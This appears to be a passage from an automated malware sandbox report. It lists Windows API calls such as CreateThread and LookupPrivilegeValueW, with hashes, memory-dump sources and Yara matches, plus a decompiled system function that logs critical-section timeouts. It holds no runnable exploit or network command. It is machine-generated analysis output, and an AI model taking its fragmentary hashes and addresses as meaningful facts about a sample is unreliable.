                                                                    • Instruction ID: 5e132e9c6e078113819e2eb39f3737a7f7adf7fffe25ab7101354e31008b8ff9
                                                                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                    • Instruction Fuzzy Hash: F101AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0DA7241C630E851CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00EACCE0,?,?), ref: 00EB705C
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: 4b74d86bfe42af7d5fcb5c346ac09a19e00ed37dcbf51293ece7a7ca142cbe85
                                                                    • Instruction ID: c1a68b71c6d75317969e0fce7158d03f197d2fbb5116b67ba3b9c7b31c3dfe9b
                                                                    • Opcode Fuzzy Hash: 4b74d86bfe42af7d5fcb5c346ac09a19e00ed37dcbf51293ece7a7ca142cbe85
                                                                    • Instruction Fuzzy Hash: 25E06D333853143AE23065ADAC03FE7B29C8B81B20F140026FA4DEA2C1D595F80142A4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,00EACFB2,00EACFB2,?,00000000,?,?), ref: 00EB8670
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                    • Instruction ID: 957d6af8ebfc2473a7ba2908c5a5a10fe71a66f5eb2c49a948e131870bb989b3
                                                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                    • Instruction Fuzzy Hash: FFE01AB12002086BDB10DF49CC85EE737ADAF88650F018555BA0867241CA30E8108BF5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,00EACFB2,00EACFB2,?,00000000,?,?), ref: 00EB8670
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: b86ce0f69160b41f642dc728448cc3b703696c3d4e65d99745e67c76f72a3c12
                                                                    • Instruction ID: 3cfe9383855fbfdb2589bafca2382536f3b5f8742b9633a5072d6ce1ff623049
                                                                    • Opcode Fuzzy Hash: b86ce0f69160b41f642dc728448cc3b703696c3d4e65d99745e67c76f72a3c12
                                                                    • Instruction Fuzzy Hash: 35E04FB12002086FDB10DF54CC84EE737ADEF88350F018555F90CA7241CA31E811CBB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,00EA7C73,?), ref: 00EAD44B
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorMode
                                                                    • String ID:
                                                                    • API String ID: 2340568224-0
                                                                    • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                    • Instruction ID: 886b2b5b9e77f8a62fc909727bc1fc1f8c102d4d1d8dbb841eee89f1a6435818
                                                                    • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                    • Instruction Fuzzy Hash: AAD0A7717503043BE610FAA49C03F6772CD5B49F04F494074F949EB3C3D964F5004161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                    • Associated: 00000007.00000002.600176683.00000000036AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.600192417.00000000036AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 4e105fa4593f11ad463731e94539a13c16fc14ed9790931ecfce4495be5bc343
                                                                    • Instruction ID: 922df3846bf11194e394d9254d4fbbf0bbb2ccab419bbc4255eb6e11f0621392
                                                                    • Opcode Fuzzy Hash: 4e105fa4593f11ad463731e94539a13c16fc14ed9790931ecfce4495be5bc343
                                                                    • Instruction Fuzzy Hash: 8BB09B719014C5C9D615D7A156097177A047BD1741F16C151D2020645A4778C091F5F5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    C-Code - Quality: 53%
                                                                    			E0364FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                    				void* _t7;
                                                                    				intOrPtr _t9;
                                                                    				intOrPtr _t10;
                                                                    				intOrPtr* _t12;
                                                                    				intOrPtr* _t13;
                                                                    				intOrPtr _t14;
                                                                    				intOrPtr* _t15;
                                                                    
                                                                    				_t13 = __edx;
                                                                    				_push(_a4);
                                                                    				_t14 =  *[fs:0x18];
                                                                    				_t15 = _t12;
                                                                    				_t7 = E035FCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                    				_push(_t13);
                                                                    				E03645720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                    				_t9 =  *_t15;
                                                                    				if(_t9 == 0xffffffff) {
                                                                    					_t10 = 0;
                                                                    				} else {
                                                                    					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                    				}
                                                                    				_push(_t10);
                                                                    				_push(_t15);
                                                                    				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                    				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                    				return E03645720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                    			}










                                                                    0x0364fdda
                                                                    0x0364fde2
                                                                    0x0364fde5
                                                                    0x0364fdec
                                                                    0x0364fdfa
                                                                    0x0364fdff
                                                                    0x0364fe0a
                                                                    0x0364fe0f
                                                                    0x0364fe17
                                                                    0x0364fe1e
                                                                    0x0364fe19
                                                                    0x0364fe19
                                                                    0x0364fe19
                                                                    0x0364fe20
                                                                    0x0364fe21
                                                                    0x0364fe22
                                                                    0x0364fe25
                                                                    0x0364fe40

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0364FDFA
                                                                    Strings
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0364FE2B
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0364FE01
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                    • Associated: 00000007.00000002.600176683.00000000036AB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000007.00000002.600192417.00000000036AF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                    • API String ID: 885266447-3903918235
                                                                    • Opcode ID: d9d5f7dba3707ca96316ec1fc9054506c44fc6430e5c8ffb73384e3cd8cd0ce4
                                                                    • Instruction ID: 8c3126b019e07a9ea268379c37ce7f7b20de8b79668946781e432c89b5d42f48
                                                                    • Opcode Fuzzy Hash: d9d5f7dba3707ca96316ec1fc9054506c44fc6430e5c8ffb73384e3cd8cd0ce4
                                                                    • Instruction Fuzzy Hash: EDF0F636640601BFD7209A45DD06F67BF6AEB45730F140324F7285A5E1DA62F82096F4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%